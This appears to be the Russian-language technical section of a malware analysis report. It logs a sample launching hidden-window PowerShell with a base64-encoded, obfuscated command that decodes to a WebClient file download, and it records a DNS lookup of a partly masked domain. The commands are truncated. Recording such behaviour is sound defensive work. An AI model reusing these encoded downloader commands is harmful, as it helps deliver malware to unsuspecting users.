Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w HIdDen -eC CQAgACAAKAAJACAAIAAuACgARwBFAHQALQBDAG8AbQBtAEEAbgBEACAAbgBFAFcALQBvAEIAagBlAGMAKgApAAkAIAAJAE4ARQB0AC4AdwBlAGIAYwBsAEkARQBuAFQAIAAgACAAKQAuAEQATwBXAE4AbABvAGEAZABmAEkATABFACgAI...
- DNS ASK yo####m.yonpf.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w HIdDen -eC CQAgACAAKAAJACAAIAAuACgARwBFAHQALQBDAG8AbQBtAEEAbgBEACAAbgBFAFcALQBvAEIAagBlAGMAKgApAAkAIAAJAE4ARQB0AC4AdwBlAGIAYwBsAEkARQBuAFQAIAAgACAAKQAuAEQATwBXAE4AbABvAGEAZABmAEkATABFACgAI...' (со скрытым окном)